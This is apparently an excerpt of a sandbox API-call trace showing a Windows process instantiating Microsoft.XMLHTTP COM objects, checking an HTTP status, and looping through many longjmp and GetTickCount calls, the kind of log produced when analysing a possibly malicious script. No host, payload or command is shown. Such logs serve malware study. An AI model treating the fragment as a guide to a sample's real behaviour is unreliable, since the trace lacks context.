	[0233.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0233.885] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0233.885] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0233.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0233.886] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0233.886] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0233.887] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0233.887] malloc (_Size=0xb0) returned 0x42e060
	[0233.889] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0233.889] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0233.889] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0233.889] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0233.890] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0233.890] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0233.891] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0233.891] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0233.891] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0233.893] GetTickCount () returned 0x116f24b
	[0233.893] GetTickCount () returned 0x116f24b
	[0233.894] longjmp () 
	[0233.894] longjmp () 
	[0233.894] longjmp () 
	[0233.894] GetCurrentThreadId () returned 0x9a8
	[0233.894] GetCurrentThreadId () returned 0x9a8
	[0233.894] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0233.894] malloc (_Size=0x80) returned 0x3c88b0
	[0233.894] longjmp () 
	[0233.895] longjmp () 
	[0233.895] longjmp () 
	[0233.895] longjmp () 
	[0233.895] longjmp () 
	[0233.896] longjmp () 
	[0233.896] longjmp () 
	[0233.896] longjmp () 
	[0233.896] longjmp () 
	[0233.897] longjmp () 
	[0233.897] longjmp () 
	[0233.897] longjmp () 
	[0233.897] longjmp () 
	[0233.897] longjmp () 
	[0233.898] longjmp () 
	[0233.898] longjmp () 
	[0233.898] longjmp () 
	[0233.899] longjmp () 
	[0233.899] longjmp () 
	[0233.899] longjmp () 
	[0233.899] longjmp () 
	[0233.900] longjmp () 
	[0233.900] longjmp () 
	[0233.900] longjmp () 
	[0233.900] longjmp () 
	[0233.900] GetTickCount () returned 0x116f24b
	[0233.900] longjmp () 
	[0233.901] longjmp () 
	[0233.901] longjmp () 
	[0233.901] longjmp () 
	[0233.901] longjmp () 
	[0233.902] longjmp () 
	[0233.902] longjmp () 
	[0233.902] longjmp () 
	[0233.902] longjmp () 
	[0233.903] longjmp () 
	[0233.903] longjmp () 
	[0233.903] longjmp () 
	[0233.903] longjmp () 
	[0233.904] longjmp () 
	[0233.904] longjmp () 
	[0233.904] longjmp () 
	[0233.904] longjmp () 
	[0233.904] longjmp () 
	[0233.905] longjmp () 
	[0233.905] longjmp () 
	[0233.905] longjmp () 
	[0233.905] longjmp () 
	[0233.906] longjmp () 
	[0233.906] longjmp () 
	[0233.906] longjmp () 
	[0233.906] longjmp () 
	[0233.907] longjmp () 
	[0233.907] longjmp () 
	[0233.907] longjmp () 
	[0233.907] longjmp () 
	[0233.908] longjmp () 
	[0233.908] longjmp () 
	[0233.908] GetTickCount () returned 0x116f25b
	[0233.908] longjmp () 
	[0233.908] longjmp () 
	[0233.909] longjmp () 
	[0233.909] longjmp () 
	[0233.909] longjmp () 
	[0233.909] longjmp () 
	[0233.910] longjmp () 
	[0233.910] longjmp () 
	[0233.910] longjmp () 
	[0233.910] longjmp () 
	[0233.911] longjmp () 
	[0233.911] longjmp () 
	[0233.911] longjmp () 
	[0233.911] longjmp () 
	[0233.912] longjmp () 
	[0233.912] longjmp () 
	[0233.912] longjmp () 
	[0233.912] longjmp () 
	[0233.913] longjmp () 
	[0233.913] longjmp () 
	[0233.913] longjmp () 
	[0233.913] longjmp () 
	[0233.913] longjmp () 
	[0233.914] longjmp () 
	[0233.914] longjmp () 
	[0233.914] longjmp () 
	[0233.915] longjmp () 
	[0233.915] longjmp () 
	[0233.915] longjmp () 
	[0233.915] longjmp () 
	[0233.916] longjmp () 
	[0233.916] longjmp () 
	[0233.916] GetTickCount () returned 0x116f25b
	[0233.916] longjmp () 
	[0233.916] longjmp () 
	[0233.917] longjmp () 
	[0233.917] longjmp () 
	[0233.917] longjmp () 
	[0233.917] longjmp () 
	[0233.918] longjmp () 
	[0233.918] longjmp () 
	[0233.918] longjmp () 
	[0233.918] longjmp () 
	[0233.918] longjmp () 
	[0233.919] longjmp () 
	[0233.919] longjmp () 
	[0233.919] longjmp () 
	[0233.919] longjmp () 
	[0233.920] longjmp () 
	[0233.920] longjmp () 
	[0233.920] longjmp () 
	[0233.920] longjmp () 
	[0233.920] longjmp () 
	[0233.921] longjmp () 
	[0233.921] longjmp () 
	[0233.921] longjmp () 
	[0233.921] longjmp () 
	[0233.922] longjmp () 
	[0233.922] longjmp () 
	[0233.922] longjmp () 
	[0233.922] longjmp () 
	[0233.923] longjmp () 
	[0233.923] longjmp () 
	[0233.923] longjmp () 
	[0233.923] longjmp () 
	[0233.924] GetTickCount () returned 0x116f26b
	[0233.924] longjmp () 
	[0233.924] longjmp () 
	[0233.924] longjmp () 
	[0233.924] longjmp () 
	[0233.925] longjmp () 
	[0233.925] longjmp () 
	[0233.925] longjmp () 
	[0233.925] longjmp () 
	[0233.926] longjmp () 
	[0233.926] longjmp () 
	[0233.926] longjmp () 
	[0233.926] longjmp () 
	[0233.927] longjmp () 
	[0233.927] longjmp () 
	[0233.927] longjmp () 
	[0233.927] longjmp () 
	[0233.928] longjmp () 
	[0233.928] longjmp () 
	[0233.928] longjmp () 
	[0233.928] longjmp () 
	[0233.928] longjmp () 
	[0233.929] longjmp () 
	[0233.929] longjmp () 
	[0233.929] longjmp () 
	[0233.929] longjmp () 
	[0233.930] longjmp () 
	[0233.930] longjmp () 
	[0233.930] longjmp () 
	[0233.930] longjmp () 
	[0233.930] longjmp () 
	[0233.931] longjmp () 
	[0233.931] longjmp () 
	[0233.931] GetTickCount () returned 0x116f26b
	[0233.931] longjmp () 
	[0233.931] longjmp () 
	[0233.932] longjmp () 
	[0233.932] longjmp () 
	[0233.932] longjmp () 
	[0233.932] longjmp () 
	[0233.933] longjmp () 
	[0233.933] longjmp () 
	[0233.933] longjmp () 
	[0233.933] longjmp () 
	[0233.934] longjmp () 
	[0233.934] longjmp () 
	[0233.934] longjmp () 
	[0233.934] longjmp () 
	[0233.934] longjmp () 
	[0233.935] longjmp () 
	[0233.935] longjmp () 
	[0233.935] longjmp () 
	[0233.935] longjmp () 
	[0233.936] longjmp () 
	[0233.936] longjmp () 
	[0233.936] longjmp () 
	[0233.936] longjmp () 
	[0233.936] longjmp () 
	[0233.937] longjmp () 
	[0233.937] longjmp () 
	[0233.937] longjmp () 
	[0233.937] longjmp () 
	[0233.938] longjmp () 
	[0233.938] longjmp () 
	[0233.938] longjmp () 
	[0233.939] longjmp () 
	[0233.939] GetTickCount () returned 0x116f27a
	[0233.939] longjmp () 
	[0233.940] longjmp () 
	[0233.940] longjmp () 
	[0233.940] longjmp () 
	[0233.940] longjmp () 
	[0233.941] longjmp () 
	[0233.941] longjmp () 
	[0233.941] longjmp () 
	[0233.941] longjmp () 
	[0233.941] longjmp () 
	[0233.942] longjmp () 
	[0233.942] longjmp () 
	[0233.942] longjmp () 
	[0233.942] longjmp () 
	[0233.943] longjmp () 
	[0233.943] longjmp () 
	[0233.943] longjmp () 
	[0233.943] longjmp () 
	[0233.943] longjmp () 
	[0233.944] longjmp () 
	[0233.944] longjmp () 
	[0233.944] longjmp () 
	[0233.944] longjmp () 
	[0233.944] longjmp () 
	[0233.945] longjmp () 
	[0233.945] longjmp () 
	[0233.945] longjmp () 
	[0233.945] longjmp () 
	[0233.946] longjmp () 
	[0233.946] longjmp () 
	[0233.946] longjmp () 
	[0233.946] longjmp () 
	[0233.947] GetTickCount () returned 0x116f27a
	[0233.947] longjmp () 
	[0233.947] longjmp () 
	[0233.947] longjmp () 
	[0233.947] longjmp () 
	[0233.947] longjmp () 
	[0233.948] longjmp () 
	[0233.948] longjmp () 
	[0233.948] longjmp () 
	[0233.948] longjmp () 
	[0233.949] longjmp () 
	[0233.949] longjmp () 
	[0233.949] longjmp () 
	[0233.949] longjmp () 
	[0233.950] longjmp () 
	[0233.950] longjmp () 
	[0233.950] longjmp () 
	[0233.950] longjmp () 
	[0233.950] longjmp () 
	[0233.951] longjmp () 
	[0233.951] longjmp () 
	[0233.951] longjmp () 
	[0233.951] longjmp () 
	[0233.951] longjmp () 
	[0233.952] longjmp () 
	[0233.952] longjmp () 
	[0233.952] longjmp () 
	[0233.952] longjmp () 
	[0233.952] longjmp () 
	[0233.953] longjmp () 
	[0233.953] longjmp () 
	[0233.953] longjmp () 
	[0233.953] longjmp () 
	[0233.954] GetTickCount () returned 0x116f27a
	[0233.954] longjmp () 
	[0233.954] longjmp () 
	[0233.954] longjmp () 
	[0233.954] longjmp () 
	[0233.955] longjmp () 
	[0233.955] longjmp () 
	[0233.955] longjmp () 
	[0233.955] longjmp () 
	[0233.956] longjmp () 
	[0233.956] longjmp () 
	[0233.956] longjmp () 
	[0233.956] longjmp () 
	[0233.956] longjmp () 
	[0233.957] longjmp () 
	[0233.957] longjmp () 
	[0233.957] longjmp () 
	[0233.957] longjmp () 
	[0233.957] longjmp () 
	[0233.958] longjmp () 
	[0233.958] longjmp () 
	[0233.958] longjmp () 
	[0233.958] longjmp () 
	[0233.958] longjmp () 
	[0233.958] longjmp () 
	[0233.959] longjmp () 
	[0233.959] longjmp () 
	[0233.959] longjmp () 
	[0233.959] longjmp () 
	[0233.959] longjmp () 
	[0233.960] longjmp () 
	[0233.960] longjmp () 
	[0233.960] longjmp () 
	[0233.960] GetTickCount () returned 0x116f28a
	[0233.960] longjmp () 
	[0233.960] longjmp () 
	[0233.961] longjmp () 
	[0233.961] longjmp () 
	[0233.961] longjmp () 
	[0233.961] longjmp () 
	[0233.962] longjmp () 
	[0233.962] longjmp () 
	[0233.962] longjmp () 
	[0233.962] longjmp () 
	[0233.962] longjmp () 
	[0233.963] longjmp () 
	[0233.963] longjmp () 
	[0233.963] longjmp () 
	[0233.963] longjmp () 
	[0233.963] longjmp () 
	[0233.964] longjmp () 
	[0233.964] longjmp () 
	[0233.964] longjmp () 
	[0233.964] longjmp () 
	[0233.965] longjmp () 
	[0233.965] longjmp () 
	[0233.965] longjmp () 
	[0233.965] longjmp () 
	[0233.966] longjmp () 
	[0233.966] longjmp () 
	[0233.966] longjmp () 
	[0233.966] longjmp () 
	[0233.967] longjmp () 
	[0233.967] longjmp () 
	[0233.967] longjmp () 
	[0233.967] longjmp () 
	[0233.967] GetTickCount () returned 0x116f28a
	[0233.967] longjmp () 
	[0233.968] longjmp () 
	[0233.968] longjmp () 
	[0233.968] longjmp () 
	[0233.968] longjmp () 
	[0233.969] longjmp () 
	[0233.969] longjmp () 
	[0233.969] longjmp () 
	[0233.969] longjmp () 
	[0233.970] longjmp () 
	[0233.970] longjmp () 
	[0233.970] longjmp () 
	[0233.970] longjmp () 
	[0233.970] longjmp () 
	[0233.971] longjmp () 
	[0233.971] longjmp () 
	[0233.971] longjmp () 
	[0233.971] longjmp () 
	[0233.972] longjmp () 
	[0233.972] longjmp () 
	[0233.972] longjmp () 
	[0233.972] longjmp () 
	[0233.972] longjmp () 
	[0233.973] longjmp () 
	[0233.973] longjmp () 
	[0233.973] longjmp () 
	[0233.973] longjmp () 
	[0233.974] longjmp () 
	[0233.974] longjmp () 
	[0233.974] longjmp () 
	[0233.974] longjmp () 
	[0233.974] longjmp () 
	[0233.975] GetTickCount () returned 0x116f299
	[0233.975] longjmp () 
	[0233.975] longjmp () 
	[0233.975] longjmp () 
	[0233.975] longjmp () 
	[0233.976] longjmp () 
	[0233.976] longjmp () 
	[0233.976] longjmp () 
	[0233.976] longjmp () 
	[0233.977] longjmp () 
	[0233.977] longjmp () 
	[0233.977] longjmp () 
	[0233.977] longjmp () 
	[0233.977] longjmp () 
	[0233.978] longjmp () 
	[0233.978] longjmp () 
	[0233.978] longjmp () 
	[0233.978] longjmp () 
	[0233.979] longjmp () 
	[0233.979] longjmp () 
	[0233.979] longjmp () 
	[0233.979] longjmp () 
	[0233.979] longjmp () 
	[0233.980] longjmp () 
	[0233.980] longjmp () 
	[0233.980] longjmp () 
	[0233.980] longjmp () 
	[0233.980] longjmp () 
	[0233.981] longjmp () 
	[0233.981] longjmp () 
	[0233.981] longjmp () 
	[0233.981] longjmp () 
	[0233.981] longjmp () 
	[0233.982] GetTickCount () returned 0x116f299
	[0233.982] longjmp () 
	[0233.982] longjmp () 
	[0233.982] longjmp () 
	[0233.982] longjmp () 
	[0233.983] longjmp () 
	[0233.983] longjmp () 
	[0233.983] longjmp () 
	[0233.983] longjmp () 
	[0233.983] longjmp () 
	[0233.984] longjmp () 
	[0233.984] longjmp () 
	[0233.984] longjmp () 
	[0233.984] longjmp () 
	[0233.985] longjmp () 
	[0233.985] longjmp () 
	[0233.986] longjmp () 
	[0233.986] longjmp () 
	[0233.986] longjmp () 
	[0233.987] longjmp () 
	[0233.987] longjmp () 
	[0233.987] longjmp () 
	[0233.987] longjmp () 
	[0233.987] longjmp () 
	[0233.988] longjmp () 
	[0233.988] longjmp () 
	[0233.988] longjmp () 
	[0233.988] longjmp () 
	[0233.989] longjmp () 
	[0233.989] longjmp () 
	[0233.989] longjmp () 
	[0233.989] longjmp () 
	[0233.989] longjmp () 
	[0233.990] GetTickCount () returned 0x116f2a9
	[0233.990] longjmp () 
	[0233.990] longjmp () 
	[0233.990] longjmp () 
	[0233.990] longjmp () 
	[0233.991] longjmp () 
	[0233.991] longjmp () 
	[0233.991] longjmp () 
	[0233.991] longjmp () 
	[0233.992] longjmp () 
	[0233.992] longjmp () 
	[0233.992] longjmp () 
	[0233.992] longjmp () 
	[0233.993] longjmp () 
	[0233.993] longjmp () 
	[0233.993] longjmp () 
	[0233.993] longjmp () 
	[0233.993] longjmp () 
	[0233.994] longjmp () 
	[0233.994] longjmp () 
	[0233.994] longjmp () 
	[0233.996] longjmp () 
	[0233.997] longjmp () 
	[0233.997] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0233.997] SysStringLen (param_1=0x0) returned 0x0
	[0233.997] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0233.997] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0233.997] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0233.998] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0233.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5c08) returned 0x0
	[0233.998] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0233.998] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5c08, pUnkSite=0x3cacc0) returned 0x0
	[0233.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0233.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0233.998] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0233.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0233.998] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0233.998] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0233.999] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0233.999] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0233.999] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0233.999] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0233.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0233.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0233.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0233.999] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0233.999] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0233.999] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0233.999] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0233.999] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0233.999] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0233.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
